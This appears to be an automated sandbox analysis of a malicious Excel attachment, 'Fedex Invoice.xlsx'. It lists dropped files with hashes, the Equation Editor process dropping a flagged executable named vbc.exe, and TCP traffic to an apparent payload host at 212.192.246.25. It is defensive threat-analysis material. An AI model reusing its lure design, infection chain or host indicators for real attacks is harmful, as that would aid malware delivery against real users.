        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A84E7AC2.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD1CC9A1.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2C85D57.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C385632E.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBE0C5C8.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDD787DB.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3F2487D.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6DC676C.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB6B38D.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):7788
        Entropy (8bit):5.545721180717153
        Encrypted:false
        SSDEEP:96:wl9nCblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wlgTNAK4oOIGbK1RvVwPAWmOHX
        MD5:BB62EE5F443BE2B2F4A6F0E9EC912168
        SHA1:0D21B1AE8F63B685973BB4AAE35D2AED0C83EA7A
        SHA-256:4EDC5BF1DE52C07FA92BEBF60D08ACD4E9D05F7022D19FB5E30A8D67F0C16C5B
        SHA-512:5FA3208CAD6032E161760DB40702CA1853BB32B911781FA0A47D0154B48B7AF7BCA3A0F7466C11E9E5F9B241A754A094B32B2E2662A95D1CBD0255F633AF8DA7
        Malicious:false
        Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................{.6.).X...H...d.............................p....\...............l.....p........<5.u..p....`.p.){.$y.w..W...$.....(......w..W.$.......d............^.p.....^.p..W...W.H.M...$.-...T....<.w................<.9u.Z.v....X..n.....){........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
        C:\Users\user\Desktop\~$Fedex Invoice.xlsx
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):330
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
        MD5:96114D75E30EBD26B572C1FC83D1D02E
        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
        Malicious:true
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        C:\Users\Public\vbc.exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):135168
        Entropy (8bit):6.633797451082329
        Encrypted:false
        SSDEEP:1536:A8N0//nCe6zBm5+JqYnViL7yQMLIn6Otq/CrAvI70qBGqdFafRo6DomgJ:TaCeWBJdVc/MLo6Ot57HdFaf5oj
        MD5:ED004FE1AA9F4FA169A05B6716C03484
        SHA1:59AF725F7F1D9582674A0236F4E41B76BBA99D83
        SHA-256:ACE5D939D3258882A6D2E2431A690EE9ED410432BFA537465A2DD9DA92441F74
        SHA-512:B52579B5A47391863BD9CD5052375C3FEFE2A104D058929A3911D552E1BF0D4EC0C30C73469713F1B0852771FCB3C206F486C06AAC4C15E561C552FD333C193E
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....VV............................p.............@..........................P..............................................$...(.......";..................................................................8... .......$............................text............................... ..`.data...dE..........................@....rsrc...";.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

        Static File Info

        General

        File type:CDFV2 Encrypted
        Entropy (8bit):7.9881378434771335
        TrID:
        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
        File name:Fedex Invoice.xlsx
        File size:611032
        MD5:ec7f52b07d135f71c63fd20054a89646
        SHA1:c89fa952eaef37a4ad0a120fa2c998cd989bbf62
        SHA256:150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
        SHA512:9ec0b0a89afe4b685e5aa6ae3e0c1d861ca84f6c31aee88c0ded285fb1b7d31a74259090bdd18036cfb832ccc74a7b36815a25e0294d6d9bf566d794fb24134e
        SSDEEP:12288:NLW1VYUxaXgVhBLvyO60L3g5lA/UeQQMPSv3QphFG93f:NLW1V/xugVhBLvyOSleePSIU3f
        File Content Preview:........................>.......................................................................................y..............................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4b4bcb4

        Network Behavior

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Sep 14, 2021 21:51:37.408901930 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.437874079 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.438127041 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.438657045 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.473706961 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473750114 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473776102 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473799944 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473925114 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505139112 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505177975 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505202055 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505218983 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505224943 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505240917 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505244970 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505254984 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505264997 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505284071 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505297899 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505306959 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505328894 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505332947 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505342960 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505373955 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.538853884 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538897038 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538923025 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538944960 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538969040 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538985014 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539002895 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539009094 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539021015 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539028883 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539041042 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539057970 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539078951 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539083958 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539096117 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539109945 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539130926 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539149046 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539165974 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539181948 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539223909 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539238930 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.541033030 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.567837954 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.567939997 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568125010 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568146944 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568167925 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568181038 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568181992 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568196058 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568208933 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568222046 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568233013 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568247080 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568263054 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568269014 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568280935 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568289995 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568296909 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568311930 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568317890 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568327904 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568336010 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568344116 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568356991 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568363905 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568377018 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568382978 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568397999 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568398952 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568414927 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568418980 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568430901 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568438053 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568447113 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568460941 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568463087 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568480015 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568483114 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568499088 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568500042 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568517923 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568519115 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568533897 CEST8049165212.192.246.25192.168.2.22
